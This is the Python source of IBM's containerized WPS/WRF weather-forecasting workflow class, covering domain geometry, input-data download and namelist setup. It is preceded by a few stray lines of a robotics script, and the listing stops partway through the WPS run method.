while sm.is_running():
rospy.rostime.wallsleep(0.5)
sis.stop()
|
Stevedore.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
IBM Containerized Forecasting Workflow
DESCRIPTION
WPS and WRF workflow for weather simulation.
AUTHOR
Timothy Lynar <timlynar@au1.ibm.com>, IBM Research, Melbourne, Australia
Frank Suits <frankst@au1.ibm.com>, IBM Research, Melbourne, Australia; Dublin, Ireland; Yorktown, USA
Beat Buesser <beat.buesser@ie.ibm.com>, IBM Research, Dublin, Ireland
NOTICE
Licensed Materials - Property of IBM
"Restricted Materials of IBM"
Copyright IBM Corp. 2017 ALL RIGHTS RESERVED
US GOVERNMENT USERS RESTRICTED RIGHTS - USE, DUPLICATION OR DISCLOSURE
RESTRICTED BY GSA ADP SCHEDULE CONTRACT WITH IBM CORP.
THE SOURCE CODE FOR THIS PROGRAM IS NOT PUBLISHED OR OTHERWISE DIVESTED OF
ITS TRADE SECRETS, IRRESPECTIVE OF WHAT HAS BEEN DEPOSITED WITH
THE U. S. COPYRIGHT OFFICE. IBM GRANTS LIMITED PERMISSION TO LICENSEES TO
MAKE HARDCOPY OR OTHER REPRODUCTIONS OF ANY MACHINE- READABLE DOCUMENTATION,
PROVIDED THAT EACH SUCH REPRODUCTION SHALL CARRY THE IBM COPYRIGHT NOTICES
AND THAT USE OF THE REPRODUCTION SHALL BE GOVERNED BY THE TERMS AND
CONDITIONS SPECIFIED BY IBM IN THE LICENSED PROGRAM SPECIFICATIONS. ANY
REPRODUCTION OR USE BEYOND THE LIMITED PERMISSION GRANTED HEREIN SHALL BE A
BREACH OF THE LICENSE AGREEMENT AND AN INFRINGEMENT OF THE APPLICABLE
COPYRIGHTS.
VERSION
o1.8
"""
from datetime import datetime, timedelta
from math import pi, cos
import os
import logging
from multiprocessing import Process, Queue, cpu_count
import shutil
import subprocess
import pytz
from netCDF4 import Dataset
from inputdataset import InputDataSet
from datasets_aux import *
from datasets_fcst import *
from datasets_hist import *
from datasets_sst import *
import util
class Stevedore(object):
'''
IBM Containerized Forecasting Workflow - WPS and WRF workflow for weather simulations.
'''
#Log level for items printed to the screen.
SCREEN_LOG_LEVEL = logging.INFO
#Number of workers to use when downloading data. When using RDA I suggest you set this to 1.
DOWNLOAD_WORKERS = 1
#Max number of domains supported by namelist instrumentation
MAXINSTRUMENTEDDOMAINS = 4
#Seconds in an hour
SEC_IN_HOUR = 3600
#The defualt dataset. If no dataset is added this will be used.
DEFAULT_DS = "GFS"
#The default history interval aka the time between output files in minutes.
DEFAULT_HIST_INT = 60
def __init__(self, datetimeStart, forecastLength, latitude, longitude, ncores=4, ndomains=3, timestep=10,
gridratio=3, gridspacinginner=1.5, ngridew=100, ngridns=100, nvertlevels=40, phys_mp=17, phys_ralw=4,
phys_rasw=4, phys_cu=1, phys_pbl=1, phys_sfcc=1, phys_sfc=2, phys_urb=0, wps_map_proj='lambert', runshort=0,
auxhist7=False, auxhist2=False, feedback=False, adaptivets=False, projectdir='default', norunwrf=False, is_analysis=False,
altftpserver=None, initialConditions=['GFS'], boundaryConditions=['GFS'], inputData=[], tsfile=None, history_interval=60):
'''
Constructor
'''
#IBM-NOTICE
self.notice = "IBM Containerized Forecasting Workflow \n Licensed Materials - Property of IBM \n Copyright IBM Corp. 2017 ALL RIGHTS RESERVED \n "
print self.notice
#End IBM Notice.
#Import the root path of this DeepThunder installation form the environment variable DEEPTHUNDER_ROOT
self.directory_root_input = os.environ.get('DEEPTHUNDER_ROOT')
#If the root path of the DeepThunder installation is not set then guess that it will be /opt/deepthunder
if self.directory_root_input is None:
self.directory_root_input = '/opt/deepthunder'
#Specify the directory containing the InputDataSets have been stored after download
self.directory_root_inputDataSets = self.directory_root_input+'/data/inputDataSets'
#Specify the directory where the DeepThunder run directory will be created
self.directory_root_run = self.directory_root_input+'/data/domains'
#Specify the the directory containing the databases on terrestrial information
self.directory_root_geog = self.directory_root_input+'/data/Terrestrial_Input_Data'
#Specify the the number of cores available to execute Real.exe and WRF.exe.
#They will run in parallel with this number
self.numberCores = ncores
#Define a list that will contain the domains to be processed
self.domains = range(1, ndomains+1)
#Specify the number of domains in this run
self.maxdom = ndomains
#Set run length in hours for WPS
self.runlength_wps = None
#Set end time / date for WPS
self.datetimeEndUTC_wps = None
#Grid spacing dx
#lambert or any other projection except lat-lon.
#gets gridspacinginner from km to meters. and sets it for the outside domain.
#self.dx is the value for the outermost domain = domain 1.
#outerdx = innerdx * 1000 = innnerdx in m * (gridratio * )
self.dx = (gridspacinginner*1000*(gridratio**(ndomains-1)))
self.wpsdx = self.dx
#Grid spacing dy (assume it is the same as dx.)
self.dy = self.dx
self.wpsdy = self.dy
#Parent grid ratio
self.parent_grid_ratio = gridratio
#Number of vertical levels
self.num_vertical_levels = nvertlevels
#Define a list that will contain the domains not just those to be processed
# in descending order
self.idomains = range(self.MAXINSTRUMENTEDDOMAINS, 0, -1)
#Physics options
#Micro Physics vairables
self.phys_mp_val = phys_mp
#Radiation Long wave Physics (ra_lw)
self.phys_ralw_val = phys_ralw
#Radiation Short wave Physics (ra_sw)
self.phys_rasw_val = phys_rasw
#Cumulus scheme - populate as list
self.phys_cu_val = util.convert_to_list(phys_cu, self.maxdom)
#Planetary boundary layer (PBL)
self.phys_pbl_val = phys_pbl
#Surface Layer Options (sf_sfclay_physics)
self.phys_sfcc_val = phys_sfcc
#Land Surface Options (sf_surface_physics)
self.phys_sfc_val = phys_sfc
#Urban Surface Options (sf_urban_physics)
self.phys_urb_val = phys_urb
#END physics options
#interval_seconds
self.sstintervalseconds = 0
self.maxintervalseconds = 0
self.WPSintervalseconds = None
#Set the number of grid points in each domain
self.domain_dims_nx = util.convert_to_list(ngridew, self.maxdom)
self.domain_dims_ny = util.convert_to_list(ngridns, self.maxdom)
#Set the history_interval
self.domain_history_interval = util.convert_to_list(history_interval, self.maxdom)
#Store in a list the sizes of the elements of the numerical grid of each domain in longitude direction
self.domain_dims_dx = []
#Store in a list the sizes of the elements of the numerical grid of each domain in latitude direction
self.domain_dims_dy = []
#WPS map projection
self.wps_map_proj = wps_map_proj
#Dictionary to store the required input data sets
self.inputDataSets = {}
#Dataset for initial conditions
self.initialConditions = initialConditions
#Dataset for boundary conditions
self.boundaryConditions = boundaryConditions
#Timestep used for forecast
self.timeStepForecast = timestep
#Load the inputDataSets and populate dictionary key = name i.e 'GFS' value = inputDataSet
#make sure that inputData = self.initialConditions + self.boundaryConditions
#Adding initialConditions to inputData.
for ds in self.initialConditions:
inputData.append(ds)
#Adding boundaryConditions to inputData.
for ds in self.boundaryConditions:
inputData.append(ds)
#After adding both initialConditions and boundaryConditions
#if inputData is still of zero size then add DEFAULT_DS
if not inputData:
print 'Added default dataset '+ str(self.DEFAULT_DS)
inputData.append(self.DEFAULT_DS)
#Adds all datasets to the dictionary inputDataSets
for ds in inputData:
print 'Add dataset '+ str(ds)
self.inputDataSets[str(ds)] = None
#Store all input files as inputDataSet
self.inputfiles = []
#Store forecastLength in hours
self.forecastLength = forecastLength
#Run short is the number of hours that you wish to prep for but not execute with wrf.
#wrf run time is set to forecastLength - runshort
self.runshort = runshort
#Store latitude of centre coordinates
self.latitude = util.convert_to_list(latitude, self.maxdom)
#Store longitude of centre coordinates
self.longitude = util.convert_to_list(longitude, self.maxdom)
#aux hist variables (true for turn on false for turn off)
self.auxhist7 = auxhist7
self.auxhist2 = auxhist2
#Feedback on or off
self.feedback = feedback
#Turn on or off adaptive time Steps
self.adaptivets = adaptivets
#Set the project directory output data will be found in /data/domains/$projectDir/
self.project_dir = projectdir
#Set a flag to run wrf. If not norunwrf run wrf
self.norunwrf = norunwrf
#Set flag for this being a reanalysis - this effects how the SST is used.
#Use this option if you need to do a long run historical simulation.
self.is_analysis = is_analysis
#alt ftp. - download all data from this server if set.
self.alt_ftp_server_url = altftpserver
#Define a pytz time zone object for Coordinated Universal Time (UTC)
utc = pytz.utc
#Create a datetime object for the forecast start time in local time zone
self.datetimeStartUTC = datetime(year=datetimeStart.year, month=datetimeStart.month,
day=datetimeStart.day, hour=datetimeStart.hour, tzinfo=utc)
#Create a datetime object for the forecast end time in local time zone
#self.datetimeEndUTC = self.datetimeStartUTC + timedelta(days=delta[0]) + timedelta(hours=delta[1])
self.datetimeEndUTC = self.datetimeStartUTC+timedelta(hours=self.forecastLength)
#Get the SST date (previous day) #will be updated latter
self.datetimeSST = self.datetimeStartUTC-timedelta(days=1)
#Time series file
self.tsfile = tsfile
#Set the directory structure of the Stevedore installation assuming Stevedore has been built with the Dockerfile provided
self.directory_WPS_input = self.directory_root_input+'/externalDependencies/src/WPS'
self.directory_WRF_input = self.directory_root_input+'/externalDependencies/WRF'
self.directory_IBM_input = self.directory_root_input+'/externalDependencies/src/IBM'
self.directory_PreProcessing_input = self.directory_root_input+'/PreProcessing'
#Set the sub-directories of the DeepThunder run directory
self.directory_run = self.directory_root_run+'/'+str(self.project_dir)+'/'+str(self.datetimeStartUTC.year)+'-'+\
str(self.datetimeStartUTC.month).zfill(2)+'-'+str(self.datetimeStartUTC.day).zfill(2)+'_'+\
str(self.datetimeStartUTC.hour).zfill(2)
self.directory_data = self.directory_root_input+'/data'
self.directory_PreProcessing_run = self.directory_run+'/PreProcessing'
self.directory_wrf_run = self.directory_run+'/WRF'
#LOGFILE
self.logfile = self.directory_run+'/IBM-CFW-logfile.log'
#Create lists to store minimum and maximum latitude and longitude of all the domains, in the same order as self.domains
#Note this bounding box is only used for data acquisition with GFSsubset.
self.lat_min = []
self.lat_max = []
self.lon_min = []
self.lon_max = []
#Calculate bounding box for each domain and dx and dy
for domain in self.domains:
#calculate dx and dy per domain in km
domspace = round(gridspacinginner*1000*gridratio**(self.maxdom-domain))
self.domain_dims_dx.append(domspace)
self.domain_dims_dy.append(domspace)
self.lat_min.append(round(self.latitude[domain-1]-1.5*self.domain_dims_ny[domain-1]*self.domain_dims_dy[domain-1] / 2.0 / 1000.0 / 111.325, 2))
self.lat_max.append(round(self.latitude[domain-1]+1.5*self.domain_dims_ny[domain-1]*self.domain_dims_dy[domain-1] / 2.0 / 1000.0 / 111.325, 2))
self.lon_min.append(round(self.longitude[domain-1]-1.5*self.domain_dims_nx[domain-1]*self.domain_dims_dx[domain-1] / 2.0 / 1000.0 / (cos(self.latitude[domain-1]/360.0*(2.0*pi)) * 111.325), 2))
self.lon_max.append(round(self.longitude[domain-1]+1.5*self.domain_dims_nx[domain-1]*self.domain_dims_dx[domain-1] / 2.0 / 1000.0 / (cos(self.latitude[domain-1]/360.0*(2.0*pi)) * 111.325), 2))
#Create the top-level run directory if it does not exist
if not os.path.exists(self.directory_run):
os.makedirs(self.directory_run)
#Initialise the OpenDeepThunder log-file
if os.path.exists(self.logfile):
os.remove(self.logfile)
#Create the logging instance for this DeepThunder object
logging.basicConfig(filename=self.logfile, level=logging.DEBUG,
format='%(asctime)s: %(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')
console = logging.StreamHandler()
console.setLevel(self.SCREEN_LOG_LEVEL)
formatter = logging.Formatter('%(asctime)s: %(message)s')
console.setFormatter(formatter)
logging.getLogger().addHandler(console)
logging.info('Construct IBM Containerized Forecasting Workflow object.')
#If the environment variable has not been set fire off a warning.
if self.directory_root_input is None:
logging.warning("The environment variable DEEPTHUNDER_ROOT has not been set so /opt/deepthunder will be used in its place")
logging.info("Domain. "+ str(self.domains)+ " "+str(self.latitude)+" "+str(self.longitude)+ " " + str(self.domain_dims_ny) + " " + str(self.domain_dims_dx))
def check_input_data(self):
"""
Determines the file names of required input data and downloads it.
"""
#Log entering check_input_data
logging.info('check_input_data: Download input data.')
#Create the directory to store the data we download if it does not already exist.
if not os.path.exists(self.directory_root_inputDataSets):
os.mkdir(self.directory_root_inputDataSets)
#Set up multiprocessing
workers = self.DOWNLOAD_WORKERS
work_queue = Queue()
done_queue = Queue()
processes = []
baddata = []
for ids in self.inputDataSets:
try:
idsMethodName = eval('InputDataSet'+str(ids))
logging.debug('check_input_data: Download input data. with '+ str(idsMethodName))
inputDataSet = idsMethodName(self.datetimeStartUTC, 0, self.directory_root_inputDataSets, is_analysis=self.is_analysis)
intervalhours = inputDataSet.intervalseconds/self.SEC_IN_HOUR
#Set the intervalseconds to the lowest of the datasets.
if inputDataSet.intervalseconds > self.maxintervalseconds:
self.maxintervalseconds = inputDataSet.intervalseconds
#If the dataset is an SST and we are not running an analysis then update the SST date
if inputDataSet.is_sst and not self.is_analysis:
try:
self.datetimeSST = inputDataSet.getSSTDate()
logging.debug('SST date set to '+str(self.datetimeSST))
except:
logging.error('Error malformed InputDataSet. SSTDate will be set to default -1 day')
#Store input dataset object also as attribute of the DeepThunder object
self.inputDataSets[ids] = (inputDataSet)
#For hours in the simulation length + 1 / the interval between files in hours.
for hour_steps in range((self.forecastLength/intervalhours)+1):
#Create a input dataset object
#note we pass the hour steps rather than the new date as this depends on the dataset if we increment the date etc.
inputDataSet = idsMethodName(self.datetimeStartUTC, hour_steps*intervalhours,
self.directory_root_inputDataSets, lon_min=self.lon_min[0],
lon_max=self.lon_max[0], lat_min=self.lat_min[0], lat_max=self.lat_max[0], is_analysis=self.is_analysis)
#Store input dataset object also as attribute of the DeepThunder object
work_queue.put(inputDataSet)
#Store input dataset object also as attribute of the DeepThunder object
self.inputfiles.append(inputDataSet)
#Log information to DeepThunder log-file
logging.debug(str(ids)+ ' filename: '+ inputDataSet.get_filename())
except:
logging.error('ERROR: ' + str(ids)+ ' may not be a recognised dataset. It will not be used.')
baddata.append(ids)
#Delete all the bad datasets to prevent future errors.
for ids in baddata:
logging.error('Removing : ' + str(ids)+ ' from datasets')
del self.inputDataSets[ids]
#Work on work_queue
for worker_id in range(workers):
try:
#
logging.debug('check_input_data: starting worker ' + str(worker_id))
process = Process(target=self._worker_download_input_data, args=(work_queue, done_queue))
process.start()
processes.append(process)
work_queue.put('STOP')
except:
logging.error("ERROR problem processing the queue")
#Wait for it all to finish downloading.
for process in processes:
process.join()
#log that we are all done.
logging.info('check_input_data: data downloaded.')
def _worker_download_input_data(self, work_queue, done_queue):
"""
Downloads the file(s) defined by and inputDataSet object
stored in the work_queue.
"""
logging.debug('_worker_download_input_data')
#Get next object waiting in the work_queue
for inputDataSet in iter(work_queue.get, 'STOP'):
#if alt_ftp_server_url flag is set the pass it on.
if self.alt_ftp_server_url != None:
logging.info('_worker_download_input_data Setting alternate ftp server as '+str(self.alt_ftp_server_url)+ 'for '+ str(inputDataSet.name))
inputDataSet.alt_server_url = str(self.alt_ftp_server_url)
#Download the input data set file
inputDataSet.download()
def run_preprocessing(self):
"""
Pre-processes the input data for a WRF simulation. It calls functions
that execute the WRF Pre-processing System and real.exe.
"""
#Log information to DeepThunder log-file
logging.info('Run pre-processing ...')
#Delete the run directory of the pre-processing if it exists
if os.path.exists(self.directory_PreProcessing_run):
shutil.rmtree(self.directory_PreProcessing_run)
#Round up the end time for WPS based on grib frequency (even though forecast length is shorter than the frequency)
#Example: 1 hour run = forecast length, but grib file every 3 hourly or 6 hourly
#Get the number of full days and remaining hours.
delta = divmod(self.forecastLength, 24)
thours = timedelta(hours=delta[1])
#What is larger the remainder of hours or self.intervalseconds Note: self.maxintervalseconds is the maximum of intervalseconds of all datasets used.
maxinterval = max(thours.seconds, self.maxintervalseconds)
#Set these interval hours as maxintervalhours
maxintervalhours = maxinterval/self.SEC_IN_HOUR
#NOTE: TL. Need to make this more elegant
#Set the end-time by using maxintervalhours
self.datetimeEndUTC_wps = self.datetimeStartUTC+timedelta(days=delta[0])+timedelta(hours=maxintervalhours)
if self.datetimeEndUTC_wps > self.datetimeEndUTC:
self.datetimeEndUTC_wps = self.datetimeEndUTC
rwps = self.datetimeEndUTC_wps - self.datetimeStartUTC # Input file frequency based run length for ungrib, metgrid and real
rwps_fdays = rwps.days * 24 # hours
rwps_fsec = rwps.seconds / self.SEC_IN_HOUR # hours
self.runlength_wps = rwps_fdays+rwps_fsec
#If input data set for initial and boundary conditions are the same
if self.initialConditions == self.boundaryConditions:
#Run the WRF Pre-Processing System for the initial and boundary conditions
self._run_WPS(self.directory_PreProcessing_run+'/WPS_boundary',
self.inputDataSets, self.datetimeEndUTC_wps)
#Run the real.exe for the initial and boundary conditions
self._run_Real(self.directory_PreProcessing_run+'/Real_boundary',
self.directory_PreProcessing_run+'/WPS_boundary',
self.boundaryConditions, self.datetimeEndUTC_wps)
#If input data set for initial and boundary conditions are different
else:
#Create a dummy copy of the input data sets
dsUngrib = self.inputDataSets.copy()
#Remove the input data set for the initial conditions
for ids in self.initialConditions:
dsUngrib.pop(ids, None)
#Run the WRF Pre-processing System for the boundary conditions
self._run_WPS(self.directory_PreProcessing_run+'/WPS_boundary',
dsUngrib, self.datetimeEndUTC_wps)
#Run the real.exe for the boundary conditions
self._run_Real(self.directory_PreProcessing_run+'/Real_boundary',
self.directory_PreProcessing_run+'/WPS_boundary',
self.boundaryConditions, self.datetimeEndUTC_wps)
#Create a dummy copy of the input data sets
dsUngrib = self.inputDataSets.copy()
#Remove the input data set for the boundary conditions
for ids in self.boundaryConditions:
dsUngrib.pop(ids, None)
#Run the WRF Pre-processing System for the initial conditions
self._run_WPS(self.directory_PreProcessing_run+'/WPS_initial',
dsUngrib, self.datetimeStartUTC)
#Run the real.exe for the initial conditions
self._run_Real(self.directory_PreProcessing_run+'/Real_initial',
self.directory_PreProcessing_run+'/WPS_initial',
self.initialConditions, self.datetimeStartUTC)
def _replace_location_strings(self, fname):
"""
Replaces all the strings in the namelist to do with the location of the domain.
"""
#Go through the datasets and find the one with the smallest interval
self.WPSintervalseconds = None
for ids in self.inputDataSets.iterkeys():
idso = self.inputDataSets[ids]
if idso.intervalseconds < self.WPSintervalseconds or self.WPSintervalseconds is None:
self.WPSintervalseconds = idso.intervalseconds
#Replace the place-holders in the namelist file with the properties of this DeepThunder object
util.replace_string_in_file(fname, 'DT_LATITUDE_DT', str(self.latitude[0]))
util.replace_string_in_file(fname, 'DT_LONGITUDE_DT', str(self.longitude[0]))
util.replace_string_in_file(fname, 'DT_GEOG_DATA_PATH_DT', str(self.directory_root_geog))
util.replace_string_in_file(fname, 'DT_MAX_DOM_DT', str(max(self.domains)))
dx = self.wpsdx
dy = self.wpsdy
if dx == 0:
dx = self.domain_dims_dx[0]
if dy == 0:
dy = self.domain_dims_dy[0]
#If we use lat-lon then dx and dy will be in degrees.
if self.wps_map_proj == 'lat-lon':
#Round to two decimal places.
#note dx and dy = distance in m.
#dxm and dy in km
dxkm = self.dx / 1000
dykm = self.dy / 1000
# km per deg at the equator.
kmperdeg = 111.1774799
dx_deg = (dxkm / kmperdeg)
dy_deg = (dykm / kmperdeg)
#set the dx
dx = dx_deg
dy = dy_deg
util.replace_string_in_file(fname, 'DT_DX_1_DT,', str(dx))
util.replace_string_in_file(fname, 'DT_DY_1_DT,', str(dy))
util.replace_string_in_file(fname, 'DT_PARENT_GRID_RATIO_DT', str(self.parent_grid_ratio))
util.replace_string_in_file(fname, 'DT_INTERVAL_SECONDS', str(self.WPSintervalseconds))
util.replace_string_in_file(fname, 'DT_WPS_MAP_PROJ_DT', str(self.wps_map_proj))
#TODO: TL This is not working. NOTE lon is not used.
# special handling for staggered domains with different centre lat/lon values
centered = (min(self.latitude) == max(self.latitude)) & (min(self.longitude) == max(self.longitude))
starti = [1]*len(self.domains)
startj = starti
for i in range(1, len(self.domains)):
starti[i] = int(self.domain_dims_nx[i-1]*(1-1.0/self.parent_grid_ratio)/2+1)
startj[i] = int(self.domain_dims_ny[i-1]*(1-1.0/self.parent_grid_ratio)/2+1)
#Apply offset of domain relative to parent, based on relative lat/lon
if not centered:
lat = self.latitude[0]
lon = self.longitude[0]
coslat = cos(lat*pi/180)
kmperdeg = 111.2 # this is not meant to be exact
for i in range(1, len(self.domains)):
dx = self.domain_dims_dx[i]
dy = self.domain_dims_dy[i]
#This calculates the difference in km between the prior domain centre and the current domain centre
shiftx = ((self.longitude[i]-self.longitude[i-1])*coslat*kmperdeg)
shifty = ((self.latitude[i]-self.latitude[i-1])*kmperdeg)
#This should point to the lower left hand corner of this domain in its parent domain coordinates.
#this gives us the middle. Now we need to subtract its length and width in parent points.
#starti[i] = starti[i-1] + (round(shiftx/(dx/1000))) * -1
#startj[i] = startj[i-1] + (round(shifty/(dy/1000))) * -1
pointsx = (round(shiftx/(dx/1000)))
pointsy = (round(shifty/(dy/1000)))
#Calculate the bottom left based on the shift.
#points to move x = (parent width - current width) /2 + pointsx
#points to move y = (parent width - current width) /2 + pointsx
starti[i] = starti[i-1]+((self.domain_dims_nx[i-1]-(self.domain_dims_nx[i]/dx))/2)+pointsx
startj[i] = startj[i-1]+((self.domain_dims_ny[i-1]-(self.domain_dims_ny[i]/dx))/2)+pointsy
#Set values for the actual domain range in use
for i in self.domains:
util.replace_string_in_file(fname, 'DT_WE_COUNT_%d_DT'%i, str(self.domain_dims_nx[i-1]))
util.replace_string_in_file(fname, 'DT_SN_COUNT_%d_DT'%i, str(self.domain_dims_ny[i-1]))
if i > 1:
nstarti = int(starti[i-1])
nstartj = int(startj[i-1])
util.replace_string_in_file(fname, 'DT_I_PARENT_START_%d_DT'%i, str(nstarti))
util.replace_string_in_file(fname, 'DT_J_PARENT_START_%d_DT'%i, str(nstartj))
#Fill the remaining non-used domains with numbers - to replace the text template values
for i in self.idomains:
if i > max(self.domains):
util.replace_string_in_file(fname, 'DT_WE_COUNT_%d_DT'%i, str(0))
util.replace_string_in_file(fname, 'DT_SN_COUNT_%d_DT'%i, str(0))
util.replace_string_in_file(fname, 'DT_I_PARENT_START_%d_DT'%i, str(0))
util.replace_string_in_file(fname, 'DT_J_PARENT_START_%d_DT'%i, str(0))
def _run_WPS(self, directory_WPS_run, dsUngrib, datetimeEndUTC):
"""
Prepares and runs the WRF Pre-processing System (WPS).
"""
#Log information to DeepThunder log-file
logging.info('_run_WPS Run WPS. Entered')
#Check if the terrestrial input data is at self.directory_root_geog
if os.path.exists(self.directory_root_geog):
logging.info('_run_WPS geog data directory exists')
#If the data does not exist then download it and extract it to where it belongs.
else:
logging.warning('_run_WPS the user has not setup static terrestrial input data.')
self._download_geog_data(self.directory_root_geog, self.directory_root_input)
#Create the run directory for WPS and all of its sub-directories
os.makedirs(directory_WPS_run+'/geogrid/src')
os.makedirs(directory_WPS_run+'/metgrid/src')
os.makedirs(directory_WPS_run+'/ungrib/src')
os.makedirs(directory_WPS_run+'/ungrib/Variable_Tables')
#Create links to the geogrid executable and table
util.link_to(self.directory_WPS_input+'/geogrid/src/geogrid.exe', directory_WPS_run+'/geogrid/src/geogrid.exe')
util.link_to(self.directory_WPS_input+'/geogrid/GEOGRID.TBL.ARW', directory_WPS_run+'/geogrid/GEOGRID.TBL')
#Create links to the metgrid executable and table
util.link_to(self.directory_WPS_input+'/metgrid/src/metgrid.exe', directory_WPS_run+'/metgrid/src/metgrid.exe')
util.link_to(self.directory_WPS_input+'/metgrid/METGRID.TBL.ARW', directory_WPS_run+'/metgrid/METGRID.TBL')
#Create links to the ungrib executable and the variable tables
util.link_to(self.directory_WPS_input+'/ungrib/src/ungrib.exe',
directory_WPS_run+'/ungrib/src/ungrib.exe')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.SST',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.SSTNCEP')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.SST',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.SSTOI')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.SST',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.SSTJPL')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.SST',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.SSTSPORT')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.SST',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.SSTMUR')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.ECMWF_sigma',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.ECMWF_sigma')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.RAP.hybrid.ncep',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.RAP')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.RAP_noLSM',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.RAP_noLSM')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.NAM',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.NAM')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.LIS',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.NASALISCONUS')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.ERA-interim.ml',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.ERAISFC')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.GFSNEW',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.GFSNEW')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.GFSNEW',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.GFSsubset')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.GFSRDA',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.GFSRDA')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.CFSR2_web',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.CFSR')
#ERAI - Vtable (model levels used). Note this Will not work if grib files contain pressure level data
if self.inputDataSets.get('ERAI') is not None:
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.ERA-interim.ml',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.ERAI')
#If the forecast starts on a date after January 15, 2015 use the upgraded version of the Global Forecast System (GFS)
if self.datetimeStartUTC <= datetime(2015, 1, 15, tzinfo=pytz.utc):
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.GFS',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.GFS')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.GFS',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.FNL')
else:
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.GFSNEW',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.GFS')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.GFSNEW',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.FNL')
#Run the linking script of WPS
util.link_to(self.directory_WPS_input+'/link_grib.csh', directory_WPS_run+'/link_grib.csh')
#Copy the template for the WPS namelist from the WPS input directory to the WPS run directory
shutil.copy(self.directory_IBM_input+'/namelist.wps', directory_WPS_run+'/namelist.wps')
#Change to the WPS run directory
os.chdir(directory_WPS_run)
#Link the executables to the current directory
util.link_to('ungrib/src/ungrib.exe', directory_WPS_run+'/ungrib.exe')
util.link_to('geogrid/src/geogrid.exe', directory_WPS_run+'/geogrid.exe')
util.link_to('metgrid/src/metgrid.exe', directory_WPS_run+'/metgrid.exe')
#Replace the place-holders in the WPS namelist file with the properties of this DeepThunder object
util.replace_string_in_file('namelist.wps', 'DT_START_DATE_TIME_DT', str(self.datetimeStartUTC.year)+'-'+str(self.datetimeStartUTC.month).zfill(2)+'-'+str(self.datetimeStartUTC.day).zfill(2)+'_'+str(self.datetimeStartUTC.hour).zfill(2)+':00:00')
util.replace_string_in_file('namelist.wps', 'DT_END_DATE_TIME_DT', str(datetimeEndUTC.year)+'-'+str(datetimeEndUTC.month).zfill(2)+'-'+str(datetimeEndUTC.day).zfill(2)+'_'+str(datetimeEndUTC.hour).zfill(2)+':00:00')
#Set all the location variables in namelist.wps
self._replace_location_strings('namelist.wps')
#For each input dataset label
dictUngrib = []
#For each input dataset file of this label
for ids in self.inputDataSets.iterkeys():
idso = self.inputDataSets[ids]
#Call the prepare function of objects of class InputDataSet
if idso.ungrib:
idso.prepare(pre_processing_input_dir=self.directory_PreProcessing_input, lon_min=self.lon_min, lon_max=self.lon_max, lat_min=self.lat_min, lat_max=self.lat_max)
if idso.ungrib:
#Run the ungrib function
if idso.name not in dictUngrib:
logging.info('_run_WPS Ungrib '+ str(idso.name))
self._ungrib(idso.type, directory_WPS_run, idso.ungrib_prefix, datetimeEndUTC)
dictUngrib.append(idso.name)
else:
logging.info('ids '+str(idso.name)+'requests ungrib skipped')
else:
logging.info('ids '+str(idso.name)+'is for verification only prepare() will not be run for this dataset')
#If ERAI compute pressure on Model levels for real.exe
if self.inputDataSets.get('ERAI') is not None:
#Setup
util.link_to(self.directory_WPS_input+'_IBM/util/ecmwf_coeffs', directory_WPS_run+'/ecmwf_coeffs') #ecmwf_coeffs
util.link_to(self.directory_WPS_input+'/util/src/calc_ecmwf_p.exe', directory_WPS_run+'/calc_ecmwf_p.exe') #calc_ecmwf_p.exe
fg_name = [] #'ERAI','PRES'
fg_name.append('ERAI')
fg_name.append('PRES')
util.replace_string_in_file('namelist.wps', ' fg_name = \'FILE\',', ' fg_name = \''+'\', \''.join(fg_name)+'\',')
#Run calc_ecmwf_p.exe
process = subprocess.Popen([directory_WPS_run+'/calc_ecmwf_p.exe'])
process.wait()
#Change to the WPS run directory
os.chdir(directory_WPS_run)
#Copy again the the template of the namelist file to have an clean version
shutil.copy(self.directory_IBM_input+'/namelist.wps', directory_WPS_run+'/namelist.wps')
#Replace the place-holders in the WPS namelist file with the properties of this DeepThunder object
